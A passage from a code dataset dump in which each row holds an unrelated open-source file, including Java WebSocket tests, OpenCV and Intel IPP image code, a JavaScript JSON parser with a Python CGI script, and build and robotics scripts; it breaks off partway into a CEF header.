max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
|---|---|---|
839
|
<filename>rt/transports/websocket/src/test/java/org/apache/cxf/transport/websocket/ahc/AhcWebSocketConduitTest.java
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.cxf.transport.websocket.ahc;
import org.apache.cxf.transport.websocket.WebSocketConstants;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNull;
import static org.junit.Assert.assertTrue;
/**
*
*/
/**
 * Unit tests for {@link AhcWebSocketConduit.Response}: parsing of WebSocket
 * response payloads supplied either as text or as raw bytes.
 */
public class AhcWebSocketConduitTest {
    /** Response carrying a status line and all headers. */
    private static final String TEST_RESPONSE1 =
        "200\r\nresponseId: 59610eed-d9de-4692-96d4-bb95a36c41ea\r\nContent-Type: text/plain\r\n\r\nHola!";
    /** Response carrying only the response-id header. */
    private static final String TEST_RESPONSE2 =
        "responseId: 59610eed-d9de-4692-96d4-bb95a36c41ea\r\n\r\nNada!";
    /** The response id embedded in both samples above. */
    private static final String RESPONSE_ID = "59610eed-d9de-4692-96d4-bb95a36c41ea";

    @Test
    public void testResponseParsing() throws Exception {
        // full response, text payload
        verifyFullResponse(parseText(TEST_RESPONSE1), false);
        // full response, binary payload
        verifyFullResponse(parseBytes(TEST_RESPONSE1.getBytes()), true);
        // id-only response, text payload
        verifyIdOnlyResponse(parseText(TEST_RESPONSE2), false);
        // id-only response, binary payload
        verifyIdOnlyResponse(parseBytes(TEST_RESPONSE2.getBytes()), true);
    }

    private static AhcWebSocketConduit.Response parseText(String data) {
        return new AhcWebSocketConduit.Response(WebSocketConstants.DEFAULT_RESPONSE_ID_KEY, data);
    }

    private static AhcWebSocketConduit.Response parseBytes(byte[] data) {
        return new AhcWebSocketConduit.Response(WebSocketConstants.DEFAULT_RESPONSE_ID_KEY, data);
    }

    /** Asserts the fields parsed from {@code TEST_RESPONSE1}. */
    private static void verifyFullResponse(AhcWebSocketConduit.Response response, boolean binary) {
        assertEquals(200, response.getStatusCode());
        assertEquals(RESPONSE_ID, response.getId());
        assertEquals("text/plain", response.getContentType());
        if (binary) {
            assertTrue(response.getEntity() instanceof byte[]);
            assertEquals("Hola!", response.getTextEntity());
        } else {
            assertTrue(response.getEntity() instanceof String);
            assertEquals("Hola!", response.getEntity());
        }
    }

    /** Asserts the fields parsed from {@code TEST_RESPONSE2} (no status, no content type). */
    private static void verifyIdOnlyResponse(AhcWebSocketConduit.Response response, boolean binary) {
        assertEquals(0, response.getStatusCode());
        assertEquals(RESPONSE_ID, response.getId());
        assertNull(response.getContentType());
        if (binary) {
            assertTrue(response.getEntity() instanceof byte[]);
            assertEquals("Nada!", response.getTextEntity());
        } else {
            assertTrue(response.getEntity() instanceof String);
            assertEquals("Nada!", response.getEntity());
        }
    }
}
| 1,276
|
3,353
|
//
// ========================================================================
// Copyright (c) 1995-2021 Mort Bay Consulting Pty Ltd and others.
//
// This program and the accompanying materials are made available under the
// terms of the Eclipse Public License v. 2.0 which is available at
// https://www.eclipse.org/legal/epl-2.0, or the Apache License, Version 2.0
// which is available at https://www.apache.org/licenses/LICENSE-2.0.
//
// SPDX-License-Identifier: EPL-2.0 OR Apache-2.0
// ========================================================================
//
package org.eclipse.jetty.websocket.javax.tests;
import java.io.IOException;
import java.net.URI;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.TimeUnit;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.websocket.CloseReason;
import javax.websocket.DeploymentException;
import javax.websocket.Endpoint;
import javax.websocket.EndpointConfig;
import javax.websocket.Session;
import javax.websocket.server.ServerEndpointConfig;
import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.server.ServerConnector;
import org.eclipse.jetty.servlet.ServletContextHandler;
import org.eclipse.jetty.servlet.ServletHolder;
import org.eclipse.jetty.util.ajax.JSON;
import org.eclipse.jetty.websocket.javax.client.internal.JavaxWebSocketClientContainer;
import org.eclipse.jetty.websocket.javax.server.config.JavaxWebSocketServletContainerInitializer;
import org.eclipse.jetty.websocket.javax.server.internal.JavaxWebSocketServerContainer;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.is;
import static org.junit.jupiter.api.Assertions.assertTrue;
public class ProgrammaticWebSocketUpgradeTest
{
private static final Map<String, String> PATH_PARAMS = Map.of("param1", "value1", "param2", "value2");
private static final JSON JSON = new JSON();
private Server server;
private ServerConnector connector;
private JavaxWebSocketClientContainer client;
@BeforeEach
public void before() throws Exception
{
client = new JavaxWebSocketClientContainer();
server = new Server();
connector = new ServerConnector(server);
server.addConnector(connector);
ServletContextHandler contextHandler = new ServletContextHandler(ServletContextHandler.SESSIONS);
contextHandler.setContextPath("/");
contextHandler.addServlet(new ServletHolder(new CustomUpgradeServlet()), "/");
server.setHandler(contextHandler);
JavaxWebSocketServletContainerInitializer.configure(contextHandler, null);
server.start();
client.start();
}
@AfterEach
public void stop() throws Exception
{
client.stop();
server.stop();
}
public static class PathParamsEndpoint extends Endpoint
{
@Override
public void onOpen(Session session, EndpointConfig config)
{
try
{
session.getBasicRemote().sendText(JSON.toJSON(session.getPathParameters()));
session.close();
}
catch (IOException e)
{
throw new RuntimeException(e);
}
}
}
public static class CustomUpgradeServlet extends HttpServlet
{
private JavaxWebSocketServerContainer container;
@Override
public void init(ServletConfig config) throws ServletException
{
super.init(config);
container = JavaxWebSocketServerContainer.getContainer(getServletContext());
}
@Override
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException
{
try
{
switch (request.getServletPath())
{
case "/echo":
{
ServerEndpointConfig sec = ServerEndpointConfig.Builder.create(EchoSocket.class, "/").build();
HashMap<String, String> pathParams = new HashMap<>();
container.upgradeHttpToWebSocket(request, response, sec, pathParams);
break;
}
case "/pathParams":
{
ServerEndpointConfig sec = ServerEndpointConfig.Builder.create(PathParamsEndpoint.class, "/").build();
container.upgradeHttpToWebSocket(request, response, sec, PATH_PARAMS);
break;
}
default:
throw new IllegalStateException();
}
}
catch (DeploymentException e)
{
throw new ServletException(e);
}
}
}
@Test
public void testWebSocketUpgrade() throws Exception
{
URI uri = URI.create("ws://localhost:" + connector.getLocalPort() + "/echo");
EventSocket socket = new EventSocket();
try (Session session = client.connectToServer(socket, uri))
{
session.getBasicRemote().sendText("hello world");
}
assertTrue(socket.closeLatch.await(5, TimeUnit.SECONDS));
String msg = socket.textMessages.poll();
assertThat(msg, is("hello world"));
assertThat(socket.closeReason.getCloseCode(), is(CloseReason.CloseCodes.NORMAL_CLOSURE));
}
@Test
public void testPathParameters() throws Exception
{
URI uri = URI.create("ws://localhost:" + connector.getLocalPort() + "/pathParams");
EventSocket socket = new EventSocket();
client.connectToServer(socket, uri);
assertTrue(socket.closeLatch.await(5, TimeUnit.SECONDS));
String msg = socket.textMessages.poll();
assertThat(JSON.fromJSON(msg), is(PATH_PARAMS));
assertThat(socket.closeReason.getCloseCode(), is(CloseReason.CloseCodes.NORMAL_CLOSURE));
}
}
| 2,537
|
56,632
|
// This file is part of OpenCV project.
// It is subject to the license terms in the LICENSE file found in the top-level directory
// of this distribution and at http://opencv.org/license.html.
#if !defined CV_CPU_OPTIMIZATION_DECLARATIONS_ONLY && \
    !defined CV_DISABLE_OPTIMIZATION && defined CV_ENABLE_INTRINSICS // TODO? C++ fallback implementation for SIMD256
// Force the universal-intrinsics layer to a fixed 256-bit lane width before
// including the intrinsics header, so the shared tests exercise the
// 256-bit (AVX2-class) code paths.
#define CV__SIMD_FORCE_WIDTH 256
#include "opencv2/core/hal/intrin.hpp"
#undef CV__SIMD_FORCE_WIDTH
// Sanity check: the forced width must have taken effect (32 bytes == 256 bits).
#if CV_SIMD_WIDTH != 32
#error "Invalid build configuration"
#endif
#endif // CV_CPU_OPTIMIZATION_DECLARATIONS_ONLY
// Instantiate the shared intrinsics test utilities inside a dedicated
// namespace; the same header is compiled once per SIMD width elsewhere.
namespace opencv_test { namespace hal { namespace intrin256 {
CV_CPU_OPTIMIZATION_NAMESPACE_BEGIN
#include "test_intrin_utils.hpp"
CV_CPU_OPTIMIZATION_NAMESPACE_END
}}} //namespace
| 283
|
6,989
|
"""
Shim to maintain backwards compatibility with old IPython.nbformat imports.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import sys
from warnings import warn
from IPython.utils.shimmodule import ShimModule, ShimWarning
warn("The `IPython.nbformat` package has been deprecated since IPython 4.0. "
"You should import from nbformat instead.", ShimWarning)
# Unconditionally insert the shim into sys.modules so that further import calls
# trigger the custom attribute access above
sys.modules['IPython.nbformat'] = ShimModule(
src='IPython.nbformat', mirror='nbformat')
| 173
|
2,023
|
this is ajax.html
------------------------------------------------
<html>
<head>
<title>simple ajax json example</title>
<script language="JavaScript">
//json parser
//from json.org with small modification
var cur_str_chr;
// Recursive-descent JSON parser (adapted from json.org), relaxed to also
// accept Python-literal output: single-quoted strings and a trailing 'L'
// on integers (Python 2 longs).
function json_parse(text) {
    var at = 0;     // index of the next character to read from `text`
    var ch = ' ';   // current character ('' once input is exhausted)
    // Throw a structured error object carrying the failure position.
    function error(m) {
        throw {
            name: 'JSONError',
            message: m,
            at: at - 1,
            text: text
        };
    }
    // Advance to the next character and return it.
    function next() {
        ch = text.charAt(at);
        at += 1;
        return ch;
    }
    // Skip whitespace (any char <= ' '); stops at end of input ('').
    function white() {
        while (ch !== '' && ch <= ' ') {
            next();
        }
    }
    // Parse a string literal. Accepts either quote character (single quotes
    // allow Python-style output); the opening quote is remembered so the
    // matching closer is required.
    function str() {
        var i, s = '', t, u;
        if (ch == '\'' || ch == '"') {
            cur_str_chr = ch;
            outer: while (next()) {
                if (ch == cur_str_chr) {
                    next();
                    return s;
                } else if (ch == '\\') {
                    // Backslash escapes, including \uXXXX.
                    switch (next()) {
                        case 'b':
                            s += '\b';
                            break;
                        case 'f':
                            s += '\f';
                            break;
                        case 'n':
                            s += '\n';
                            break;
                        case 'r':
                            s += '\r';
                            break;
                        case 't':
                            s += '\t';
                            break;
                        case 'u':
                            // Four hex digits; a non-hex digit aborts the
                            // whole string via the labeled loop.
                            u = 0;
                            for (i = 0; i < 4; i += 1) {
                                t = parseInt(next(), 16);
                                if (!isFinite(t)) {
                                    break outer;
                                }
                                u = u * 16 + t;
                            }
                            s += String.fromCharCode(u);
                            break;
                        default:
                            // Unknown escape: keep the character literally.
                            s += ch;
                    }
                } else {
                    s += ch;
                }
            }
        }
        error("Bad string");
    }
    // Parse an array: '[' value (',' value)* ']'.
    function arr() {
        var a = [];
        if (ch == '[') {
            next();
            white();
            if (ch == ']') {
                next();
                return a;   // empty array
            }
            while (ch) {
                a.push(val());
                white();
                if (ch == ']') {
                    next();
                    return a;
                } else if (ch != ',') {
                    break;  // neither ',' nor ']' -> malformed
                }
                next();
                white();
            }
        }
        error("Bad array");
    }
    // Parse an object: '{' string ':' value (',' ...)* '}'.
    function obj() {
        var k, o = {};
        if (ch == '{') {
            next();
            white();
            if (ch == '}') {
                next();
                return o;   // empty object
            }
            while (ch) {
                k = str();
                white();
                if (ch != ':') {
                    break;
                }
                next();
                o[k] = val();
                white();
                if (ch == '}') {
                    next();
                    return o;
                } else if (ch != ',') {
                    break;
                }
                next();
                white();
            }
        }
        error("Bad object");
    }
    // Parse a number: optional '-', digits, optional fraction and exponent.
    function num() {
        var n = '', v;
        if (ch == '-') {
            n = '-';
            next();
        }
        while (ch >= '0' && ch <= '9') {
            n += ch;
            next();
        }
        if (ch == '.') {
            n += '.';
            while (next() && ch >= '0' && ch <= '9') {
                n += ch;
            }
        }
        if (ch == 'e' || ch == 'E') {
            n += 'e';
            next();
            if (ch == '-' || ch == '+') {
                n += ch;
                next();
            }
            while (ch >= '0' && ch <= '9') {
                n += ch;
                next();
            }
        }
        // Swallow a trailing 'L' emitted by Python 2 long literals.
        if (ch == 'L')next();
        v = +n;
        if (!isFinite(v)) {
            error("Bad number");
        } else {
            return v;
        }
    }
    // Parse the bare words true / false / null.
    function word() {
        switch (ch) {
            case 't':
                if (next() == 'r' && next() == 'u' && next() == 'e') {
                    next();
                    return true;
                }
                break;
            case 'f':
                if (next() == 'a' && next() == 'l' && next() == 's' &&
                        next() == 'e') {
                    next();
                    return false;
                }
                break;
            case 'n':
                if (next() == 'u' && next() == 'l' && next() == 'l') {
                    next();
                    return null;
                }
                break;
        }
        error("Syntax error");
    }
    // Dispatch on the first non-whitespace character of a value.
    function val() {
        white();
        switch (ch) {
            case '{':
                return obj();
            case '[':
                return arr();
            case '\'':
            case '"':
                return str();
            case '-':
                return num();
            default:
                return ch >= '0' && ch <= '9' ? num() : word();
        }
    }
    return val();
}
//end json parser
// Fire an async GET at `dest` and route the reply to pop_table.
// NOTE: `xmlhttp` is intentionally an implicit global so the pop_table
// callback can reach the same request object.
function loadurl(dest) {
    // ActiveXObject branch is the legacy IE (<7) fallback.
    xmlhttp = window.XMLHttpRequest?new XMLHttpRequest(): new ActiveXObject("Microsoft.XMLHTTP");
    xmlhttp.onreadystatechange = pop_table;
    xmlhttp.open("GET", dest);
    // Stale If-Modified-Since date defeats browser caching of the response.
    xmlhttp.setRequestHeader("If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT");
    xmlhttp.send(null);
}
// XHR callback: once the request is DONE (readyState 4) and successful
// (status 200), parse the body and populate the demo table cell by cell.
function pop_table() {
    if ((xmlhttp.readyState == 4) && (xmlhttp.status == 200)) {
        var json_data = json_parse(xmlhttp.responseText);
        var rows = document.getElementById("testtable").getElementsByTagName("tr");
        // Row 0 from the first element (object keyed one/two/three).
        rows[0].childNodes[0].innerHTML = json_data[0]['one']
        rows[0].childNodes[1].innerHTML = json_data[0]['two']
        rows[0].childNodes[2].innerHTML = json_data[0]['three']
        // Row 1 from the second element (a plain array).
        for(i=0;i<rows[1].childNodes.length;i++)
            rows[1].childNodes[i].innerHTML = json_data[1][i]
        // Row 2 from the third element; middle cell is left untouched.
        rows[2].childNodes[0].innerHTML = json_data[2]['title']
        rows[2].childNodes[2].innerHTML = json_data[2]['random']
    }
}
</script>
</head>
<body>
<div id="clickhere" onclick="loadurl('/cgi-bin/ajax.cgi')">click here</div>
<table id="testtable" border=1>
<tr><td>11</td><td>12</td><td>13</td></tr>
<tr><td>21</td><td>22</td><td>23</td></tr>
<tr><td>31</td><td>32</td><td>33</td></tr>
</table>
</body>
</html>
--------------------------------------------
This is /cgi-bin/ajax.cgi
--------------------------------------------
#!/bin/env python
# Python 2 CGI script (print statement, 12345678L long literal). It emits a
# Python repr of the data rather than strict JSON; the client-side
# json_parse in ajax.html tolerates the single quotes and trailing 'L'.
import random
print "Content-type: text/html;charset=utf-8\r\n"
data =[]
data.append({"one":'Hello world',"two":12345678L,"three":3.1415926})
data.append(['to',"be","or",'not',"to",'be'])
data.append({'title':"that's the question",'random':random.randrange(0,1000000)})
print str(data)
----------------------------------------------
| 5,122
|
782
|
// Copyright (c) 2018 Intel Corporation
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
#include "precomp.h"
#include "owncc.h"
#if defined(_REF_LIB)
extern void lmmintrin_init();
#endif
#if _IPPLRB >= _IPPLRB_B1
void lrbAlYCbCr422_8u_P3C2R( const Ipp8u* pSrc[3], int srcStep[3], Ipp8u* pDst, int dstStep, IppiSize roiSize);
void lrbYCbCr422_8u_P3C2R ( const Ipp8u* pSrc[3], int srcStep[3], Ipp8u* pDst, int dstStep, IppiSize roiSize);
#endif
#if defined _A6
extern void Join422_8u_A6 (const Ipp8u* src[3], int step[3],
Ipp8u* dst, int dstep, int width, int height);
extern void Split422_8u_A6(const Ipp8u* src, int step,
Ipp8u* dst[3], int dstep[3], int width, int height);
#endif
#if _IPP > _IPP_A6 /*defined _W7*/
extern void Join422_8u_W7 (const Ipp8u* src[3], int step[3],
Ipp8u* dst, int dstep, int width, int height);
extern void Split422_8u_W7(const Ipp8u* src, int step,
Ipp8u* dst[3], int dstep[3], int width, int height);
#endif
#if defined _I7
extern void Join422_8u_I7 (Ipp8u*, Ipp8u*, Ipp8u*, Ipp8u*, int*, int, int);
extern void Split422_8u_I7(const Ipp8u*, Ipp8u*, Ipp8u*, Ipp8u*, int*, int, int);
#endif
/*
formerly mfxiJoin422_8u_P3C2R
The input consists of three planes:
plane #1
y0y1y2y3y4y5 G (roiSize applies to this plane)
plane #2
cb0cb1cb2 B
plane #3
cr0cr1cr2 R
The output should be the interleaved sequence
y0 cb0 y1 cr0 y2 cb1 y3 cr1 y4 cb2 y5 cr2 */
/* Interleave planar YCbCr 4:2:2 (Y, Cb, Cr planes) into a packed Y0Cb0Y1Cr0
 * 2-bytes-per-pixel buffer. The implementation is selected at build time:
 * LRB intrinsics, I7/W7/A6 assembly helpers, or a portable C loop. */
IPPFUN(IppStatus,mfxiYCbCr422_8u_P3C2R,( const Ipp8u* pSrc[3], int srcStep[3],
    Ipp8u* pDst, int dstStep, IppiSize roiSize))
{
#if defined _I7
    int Inp_Arr[4];
#endif
    Ipp8u* pSrc_Y0 ;
    Ipp8u* pSrc_cB ;
    Ipp8u* pSrc_cR ;
    int Step_Y ;
    int Step_cB ;
    int Step_cR ;
    /* test pointers */
    IPP_BAD_PTR1_RET(pSrc);
    IPP_BAD_PTR1_RET(pDst);
    IPP_BAD_PTR1_RET(pSrc[0]); IPP_BAD_PTR1_RET(pSrc[1]); IPP_BAD_PTR1_RET(pSrc[2]);
    /* width must cover at least one luma pair; height must be positive */
    IPP_BADARG_RET((roiSize.width < 2), ippStsSizeErr);
    IPP_BADARG_RET((roiSize.height<=0), ippStsSizeErr);
    pSrc_Y0 = (Ipp8u*)pSrc[0];
    pSrc_cB = (Ipp8u*)pSrc[1];
    pSrc_cR = (Ipp8u*)pSrc[2];
    Step_Y = srcStep[0];
    Step_cB = srcStep[1];
    Step_cR = srcStep[2];
    /* test ROI size */
#if defined(_REF_LIB)
    lmmintrin_init();
#endif
#if _IPPLRB >= _IPPLRB_B1
    /* LRB build: pick the aligned kernel only when every pointer and step
     * satisfies its alignment requirement, otherwise use the generic one. */
    if(
        !(
            (srcStep[0] & 0x0f) || (srcStep[1] & 0x0f) || (srcStep[2] & 0x07) ||
            (dstStep & 0x0f) || (IPP_UINT_PTR(pDst) & 0x0f) ||
            (IPP_UINT_PTR(pSrc[0]) & 0x0f) || (IPP_UINT_PTR(pSrc[1]) & 0x07) ||
            (IPP_UINT_PTR(pSrc[2]) & 0x07)
        )
    )
        lrbAlYCbCr422_8u_P3C2R( pSrc, srcStep, pDst, dstStep, roiSize);
    else
        lrbYCbCr422_8u_P3C2R( pSrc, srcStep, pDst, dstStep, roiSize);
    //return ippStsNoErr;
#elif !defined _I7
    /* round width down to an even number of luma samples */
    roiSize.width &= -2;
    //#if !defined _I7
# if _IPP < _IPP_A6
    /* portable C fallback: width now counts output bytes (2 per pixel) */
    roiSize.width *= 2;
    int i;
    for(i = 0; i < roiSize.height; i++) {
        int j;
        int k = 0; /* chroma index */
        int m = 0; /* luma index */
        for(j = 0; j < roiSize.width; j += 4)
        {
            /* pack Y Cb Y Cr for each pair of luma samples */
            pDst[j + 0] = pSrc_Y0[m ];
            pDst[j + 1] = pSrc_cB[k ];
            pDst[j + 2] = pSrc_Y0[m + 1];
            pDst[j + 3] = pSrc_cR[k ];
            m += 2;
            k++;
        }
        pSrc_Y0 += Step_Y;
        pSrc_cB += Step_cB;
        pSrc_cR += Step_cR;
        pDst += dstStep;
    }
# elif _IPP > _IPP_A6
    Join422_8u_W7(pSrc, srcStep, pDst, dstStep, roiSize.width, roiSize.height);
# else
    Join422_8u_A6(pSrc, srcStep, pDst, dstStep, roiSize.width, roiSize.height);
# endif
#else
    /* I7 helper takes the four strides packed into one array */
    Inp_Arr[0] = Step_Y;
    Inp_Arr[1] = Step_cB;
    Inp_Arr[2] = Step_cR;
    Inp_Arr[3] = dstStep;
    Join422_8u_I7(pSrc_Y0, pSrc_cB, pSrc_cR, pDst, Inp_Arr, roiSize.width, roiSize.height);
#endif
    return ippStsNoErr;
} /* mfxiJoin422_8u_P3C2R() */
| 2,439
|
4,036
|
<reponame>timoles/codeql<gh_stars>1000+
import java.util.Random;
public class Test {
    /**
     * Draws and discards one pseudo-random int. Exists purely to exercise
     * the {@link Random} API (e.g. as a static-analysis fixture).
     */
    public static void test() {
        Random generator = new Random();
        generator.nextInt();
    }
}
| 58
|
619
|
<gh_stars>100-1000
from typing import List
from pyrep.objects.joint import Joint
from rlbench.backend.task import Task
from rlbench.backend.conditions import JointCondition
class CloseBox(Task):
    """RLBench task: close the lid of a box.

    Success is judged solely by the angle of the lid joint.
    """
    def init_task(self) -> None:
        # The lid is modelled as a single joint named 'joint' in the scene.
        box_joint = Joint('joint')
        # Succeed once the joint has moved past 2.6 — units depend on
        # JointCondition (presumably radians for a revolute joint;
        # TODO confirm against rlbench docs).
        self.register_success_conditions([JointCondition(box_joint, 2.6)])
    def init_episode(self, index: int) -> List[str]:
        # Natural-language descriptions of the (single) goal.
        return ['close box',
                'close the lid on the box',
                'shut the box',
                'shut the box lid']
    def variation_count(self) -> int:
        # Only one variation of this task exists.
        return 1
| 246
|
341
|
# -*- coding: utf-8 -*-
# @Author: <NAME>
# @Date: 2018-10-30 19:14:37
# @Last Modified by: <NAME>
# @Last Modified time: 2018-11-22 15:12:36
import os
import cv2
import sys
import numpy as np
from PIL import Image, ImageDraw
# Directory holding the frames plus groundtruth.txt, and the output dir.
data_dir = '/home/song/srpn/dataset/vid/ILSVRC2015_VID_train_0000/ILSVRC2015_train_00010013' # contain img and groundtruth.txt
save_dir = '/home/song/srpn/tmp/tmp_script'

# Collect the frame filenames in sorted (temporal) order.
imgnames = sorted(n for n in os.listdir(data_dir) if n.find('.jpg') != -1)

# One ground-truth line per frame: "x1,y1,w,h,..." (extra fields ignored).
gt_path = os.path.join(data_dir, 'groundtruth.txt')
with open(gt_path, 'r') as f:
    lines = f.readlines()

for idx, imgname in enumerate(imgnames):
    print(idx)
    # Parse the box for this frame and convert width/height to the far corner.
    x1, y1, w, h = [int(float(v)) for v in lines[idx].split(',')[:4]]
    x2, y2 = x1 + w, y1 + h
    # Draw the box outline on the frame and save it under its index.
    im = Image.open(os.path.join(data_dir, imgname))
    draw = ImageDraw.Draw(im)
    draw.line([(x1, y1), (x2, y1), (x2, y2), (x1, y2), (x1, y1)], width=1, fill='red')
    im.save(os.path.join(save_dir, '{}.jpg'.format(idx)))
| 466
|
1,337
|
<gh_stars>1000+
/*
* Copyright (c) 2008-2019 Haulmont.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.haulmont.cuba.core.app;
import com.haulmont.cuba.core.PersistenceSecurity;
import com.haulmont.cuba.core.entity.Entity;
import com.haulmont.cuba.security.entity.EntityOp;
import com.haulmont.cuba.security.group.ConstraintValidationResult;
import com.haulmont.cuba.security.group.PersistenceSecurityService;
import org.springframework.stereotype.Service;
import javax.inject.Inject;
/**
 * Middleware service bean exposing {@link PersistenceSecurity} checks to
 * clients of {@link PersistenceSecurityService}. All methods delegate
 * directly without additional logic.
 */
@Service(PersistenceSecurityService.NAME)
public class PersistenceSecurityServiceBean implements PersistenceSecurityService {
    /** The security facade this bean delegates every call to. */
    @Inject
    protected PersistenceSecurity persistenceSecurity;
    @Override
    public boolean isPermitted(Entity entity, EntityOp operation) {
        return persistenceSecurity.isPermitted(entity, operation);
    }
    @Override
    public boolean isPermitted(Entity entity, String customCode) {
        return persistenceSecurity.isPermitted(entity, customCode);
    }
    @Override
    public Object evaluateConstraintScript(Entity entity, String groovyScript) {
        return persistenceSecurity.evaluateConstraintScript(entity, groovyScript);
    }
    @Override
    public ConstraintValidationResult validateConstraintScript(String entityType, String groovyScript) {
        return persistenceSecurity.validateConstraintScript(entityType, groovyScript);
    }
}
| 564
|
376
|
<filename>sample/src/main/java/com/greenfrvr/hashtagview/sample/SamplesAdapter.java
package com.greenfrvr.hashtagview.sample;
import android.content.Context;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.support.v4.app.FragmentStatePagerAdapter;
import android.util.SparseArray;
import com.greenfrvr.hashtagview.sample.fragments.BaseSampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.ContactsFragment;
import com.greenfrvr.hashtagview.sample.fragments.DistributionSampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.EventsSampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.GravitySampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.SpacingSampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.StylingSampleFragment;
/**
* Created by greenfrvr
*/
/**
 * Pager adapter serving the sample fragments of the hashtag-view demo, one
 * page per sample, instantiated lazily by class name.
 */
public class SamplesAdapter extends FragmentStatePagerAdapter {
    private static final int COUNT = 7;
    /** Page position -> fully-qualified fragment class name. */
    private static final SparseArray<String> fragments = new SparseArray<>(COUNT);

    static {
        // Register the sample pages in display order.
        String[] pages = {
                BaseSampleFragment.class.getName(),
                GravitySampleFragment.class.getName(),
                DistributionSampleFragment.class.getName(),
                SpacingSampleFragment.class.getName(),
                EventsSampleFragment.class.getName(),
                StylingSampleFragment.class.getName(),
                ContactsFragment.class.getName()
        };
        for (int position = 0; position < pages.length; position++) {
            fragments.append(position, pages[position]);
        }
    }

    private final Context context;

    public SamplesAdapter(FragmentManager fm, Context context) {
        super(fm);
        this.context = context;
    }

    @Override
    public Fragment getItem(int position) {
        // Fragments are created reflectively from their registered class name.
        return Fragment.instantiate(context, fragments.get(position));
    }

    @Override
    public int getCount() {
        return COUNT;
    }
}
| 661
|
6,278
|
from multiprocessing import cpu_count
from os.path import join
import sh
from pythonforandroid.util import current_directory, ensure_dir
from pythonforandroid.toolchain import shprint
from pythonforandroid.recipe import Recipe
class LibwebpRecipe(Recipe):
    """python-for-android recipe that builds libwebp (plus its decoder,
    demux and mux shared libraries) for a target arch using CMake with the
    Android NDK toolchain file."""
    version = '1.1.0'
    url = 'https://storage.googleapis.com/downloads.webmproject.org/releases/webp/libwebp-{version}.tar.gz'  # noqa
    depends = []
    # Shared objects the build produces, mapped to their location (relative
    # to the build dir) after `make install`.
    built_libraries = {
        'libwebp.so': 'installation/lib',
        'libwebpdecoder.so': 'installation/lib',
        'libwebpdemux.so': 'installation/lib',
        'libwebpmux.so': 'installation/lib',
    }
    def build_arch(self, arch):
        """Configure, build and install libwebp for ``arch`` via CMake."""
        source_dir = self.get_build_dir(arch.arch)
        build_dir = join(source_dir, 'build')
        install_dir = join(source_dir, 'installation')
        # The NDK's CMake toolchain file handles cross-compilation setup.
        toolchain_file = join(
            self.ctx.ndk_dir, 'build', 'cmake', 'android.toolchain.cmake',
        )
        ensure_dir(build_dir)
        with current_directory(build_dir):
            env = self.get_recipe_env(arch)
            shprint(sh.cmake, source_dir,
                    f'-DANDROID_ABI={arch.arch}',
                    f'-DANDROID_NATIVE_API_LEVEL={self.ctx.ndk_api}',
                    f'-DCMAKE_TOOLCHAIN_FILE={toolchain_file}',
                    f'-DCMAKE_INSTALL_PREFIX={install_dir}',
                    '-DCMAKE_BUILD_TYPE=Release',
                    '-DBUILD_SHARED_LIBS=1',
                    _env=env)
            shprint(sh.make, '-j' + str(cpu_count()), _env=env)
            # We make the install because this way we will have
            # all the includes and libraries in one place
            shprint(sh.make, 'install', _env=env)
recipe = LibwebpRecipe()
| 829
|
1,686
|
// Copyright (c) 2019 The Chromium Embedded Framework Authors. All rights
// reserved. Use of this source code is governed by a BSD-style license that
// can be found in the LICENSE file.
#ifndef CEF_LIBCEF_DLL_SHUTDOWN_CHECKER_H_
#define CEF_LIBCEF_DLL_SHUTDOWN_CHECKER_H_
#pragma once
namespace shutdown_checker {
// Check that CEF objects are not held at CefShutdown.
